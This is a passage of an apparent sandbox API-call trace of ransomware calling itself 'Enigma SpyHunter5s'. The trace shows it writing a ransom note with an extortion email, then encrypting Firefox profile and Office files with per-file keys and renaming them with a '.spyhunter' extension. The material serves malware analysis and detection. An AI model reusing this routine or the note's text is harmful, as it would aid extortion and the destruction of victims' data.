[0150.330] GetProcessHeap () returned 0x2c0000 [0150.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0150.330] GetProcessHeap () returned 0x2c0000 [0150.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81540 | out: hHeap=0x2c0000) returned 1 [0150.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.392] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0150.392] WriteFile (in: hFile=0xa0, lpBuffer=0x25cec6b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x25cec6b*, lpNumberOfBytesWritten=0x25ced94*=0x127, lpOverlapped=0x0) returned 1 [0150.393] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0150.393] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ced94, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ced94*=0x2ac, lpOverlapped=0x0) returned 1 [0150.393] CloseHandle (hObject=0xa0) returned 1 [0150.393] GetProcessHeap () returned 0x2c0000 [0150.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f46328 | out: hHeap=0x2c0000) returned 1 [0150.393] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced30 | out: pbBuffer=0x25ced30) returned 1 [0150.393] GetProcessHeap () returned 0x2c0000 [0150.393] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced28*=0x30) returned 1 [0150.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0150.394] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json") returned 112 [0150.394] StrStrW (lpFirst="webapps.json", lpSrch=".txt") returned 0x0 [0150.394] GetProcessHeap () returned 0x2c0000 [0150.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0150.394] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cecec*=0x2, lpOverlapped=0x0) returned 1 [0150.395] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffffe, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.396] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cecec*=0x2, lpOverlapped=0x0) returned 1 [0150.396] GetProcessHeap () returned 0x2c0000 [0150.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0150.396] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.396] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x25ced2c*, lpNumberOfBytesWritten=0x25cecec*=0x4, lpOverlapped=0x0) returned 1 [0150.396] WriteFile (in: hFile=0xa0, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecec*=0x30, lpOverlapped=0x0) returned 1 [0150.396] CloseHandle (hObject=0xa0) returned 1 [0150.396] GetProcessHeap () returned 0x2c0000 [0150.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.396] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.spyhunter") returned 122 [0150.397] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\webapps\\webapps.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\webapps\\webapps.json.spyhunter")) returned 1 [0150.397] GetProcessHeap () returned 0x2c0000 [0150.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.397] GetProcessHeap () returned 0x2c0000 [0150.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.397] GetProcessHeap () returned 0x2c0000 [0150.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9268 | out: hHeap=0x2c0000) returned 1 [0150.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced30 | out: pbBuffer=0x25ced30) returned 1 [0150.398] GetProcessHeap () returned 0x2c0000 [0150.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced28*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced28*=0x30) returned 1 [0150.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0150.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json") returned 102 [0150.407] StrStrW (lpFirst="times.json", lpSrch=".txt") returned 0x0 [0150.407] GetProcessHeap () returned 0x2c0000 [0150.407] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.408] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cecec*=0x1d, lpOverlapped=0x0) returned 1 [0150.409] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffffe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.409] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cecec*=0x1d, lpOverlapped=0x0) returned 1 [0150.409] GetProcessHeap () returned 0x2c0000 [0150.409] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.409] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.409] WriteFile (in: hFile=0x9c, lpBuffer=0x25ced2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x25ced2c*, lpNumberOfBytesWritten=0x25cecec*=0x4, lpOverlapped=0x0) returned 1 [0150.409] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecec, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecec*=0x30, lpOverlapped=0x0) returned 1 [0150.409] CloseHandle (hObject=0x9c) returned 1 [0150.409] GetProcessHeap () returned 0x2c0000 [0150.409] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.409] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.spyhunter") returned 112 [0150.410] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\times.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\times.json.spyhunter")) returned 1 [0150.410] GetProcessHeap () returned 0x2c0000 [0150.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.410] GetProcessHeap () returned 0x2c0000 [0150.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.410] GetProcessHeap () returned 0x2c0000 [0150.410] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f686a0 | out: hHeap=0x2c0000) returned 1 [0150.411] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced28 | out: pbBuffer=0x25ced28) returned 1 [0150.411] GetProcessHeap () returned 0x2c0000 [0150.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.411] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced20*=0x30) returned 1 [0150.411] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0150.411] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak") returned 108 [0150.411] StrStrW (lpFirst="sessionstore.bak", lpSrch=".txt") returned 0x0 [0150.411] GetProcessHeap () returned 0x2c0000 [0150.411] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0150.411] ReadFile (in: hFile=0x9c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cece4*=0x3d6, lpOverlapped=0x0) returned 1 [0150.561] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xfffffc2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.561] WriteFile (in: hFile=0x9c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x3d6, lpNumberOfBytesWritten=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cece4*=0x3d6, lpOverlapped=0x0) returned 1 [0150.562] GetProcessHeap () returned 0x2c0000 [0150.562] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0150.562] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.562] WriteFile (in: hFile=0x9c, lpBuffer=0x25ced24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x25ced24*, lpNumberOfBytesWritten=0x25cece4*=0x4, lpOverlapped=0x0) returned 1 [0150.562] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cece4*=0x30, lpOverlapped=0x0) returned 1 [0150.562] CloseHandle (hObject=0x9c) returned 1 [0150.573] GetProcessHeap () returned 0x2c0000 [0150.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0150.573] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.spyhunter") returned 118 [0150.573] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\sessionstore.bak.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\sessionstore.bak.spyhunter")) returned 1 [0150.574] GetProcessHeap () returned 0x2c0000 [0150.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0150.574] GetProcessHeap () returned 0x2c0000 [0150.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0150.574] GetProcessHeap () returned 0x2c0000 [0150.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0f58 | out: hHeap=0x2c0000) returned 1 [0150.574] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced28 | out: pbBuffer=0x25ced28) returned 1 [0150.575] GetProcessHeap () returned 0x2c0000 [0150.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0150.575] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced20*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced20*=0x30) returned 1 [0150.575] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0150.575] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite") returned 105 [0150.575] StrStrW (lpFirst="places.sqlite", lpSrch=".txt") returned 0x0 [0150.575] GetProcessHeap () returned 0x2c0000 [0150.575] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0150.575] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cece4*=0x2800, lpOverlapped=0x0) returned 1 [0150.582] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0150.582] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cece4*=0x2800, lpOverlapped=0x0) returned 1 [0150.582] GetProcessHeap () returned 0x2c0000 [0150.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0150.582] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0150.582] WriteFile (in: hFile=0x9c, lpBuffer=0x25ced24*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x25ced24*, lpNumberOfBytesWritten=0x25cece4*=0x4, lpOverlapped=0x0) returned 1 [0156.097] WriteFile (in: hFile=0x9c, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cece4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cece4*=0x30, lpOverlapped=0x0) returned 1 [0156.097] CloseHandle (hObject=0x9c) returned 1 [0156.097] GetProcessHeap () returned 0x2c0000 [0156.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0156.097] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.spyhunter") returned 115 [0156.097] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\places.sqlite.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\places.sqlite.spyhunter")) returned 1 [0156.098] GetProcessHeap () returned 0x2c0000 [0156.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0156.098] GetProcessHeap () returned 0x2c0000 [0156.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.098] GetProcessHeap () returned 0x2c0000 [0156.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc0d08 | out: hHeap=0x2c0000) returned 1 [0156.098] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced20 | out: pbBuffer=0x25ced20) returned 1 [0156.098] GetProcessHeap () returned 0x2c0000 [0156.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.098] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced18*=0x30) returned 1 [0156.098] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0156.170] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig") returned 112 [0156.170] StrStrW (lpFirst="350db95df4cbd94b2a1c300510e12e11.sig", lpSrch=".txt") returned 0x0 [0156.170] GetProcessHeap () returned 0x2c0000 [0156.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0156.170] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cecdc*=0x80, lpOverlapped=0x0) returned 1 [0156.171] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.171] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cecdc*=0x80, lpOverlapped=0x0) returned 1 [0156.171] GetProcessHeap () returned 0x2c0000 [0156.171] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0156.171] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0156.171] WriteFile (in: hFile=0x178, lpBuffer=0x25ced1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x25ced1c*, lpNumberOfBytesWritten=0x25cecdc*=0x4, lpOverlapped=0x0) returned 1 [0156.172] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cecdc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cecdc*=0x30, lpOverlapped=0x0) returned 1 [0156.172] CloseHandle (hObject=0x178) returned 1 [0156.172] GetProcessHeap () returned 0x2c0000 [0156.172] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0156.172] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.spyhunter") returned 122 [0156.172] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Office\\ONetConfig\\350db95df4cbd94b2a1c300510e12e11.sig.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\office\\onetconfig\\350db95df4cbd94b2a1c300510e12e11.sig.spyhunter")) returned 1 [0156.173] GetProcessHeap () returned 0x2c0000 [0156.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0156.173] GetProcessHeap () returned 0x2c0000 [0156.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0156.173] GetProcessHeap () returned 0x2c0000 [0156.173] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47bc8 | out: hHeap=0x2c0000) returned 1 [0156.173] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced20 | out: pbBuffer=0x25ced20) returned 1 [0156.173] GetProcessHeap () returned 0x2c0000 [0156.173] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0156.173] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25ced18*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25ced18*=0x30) returned 1 [0156.174] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 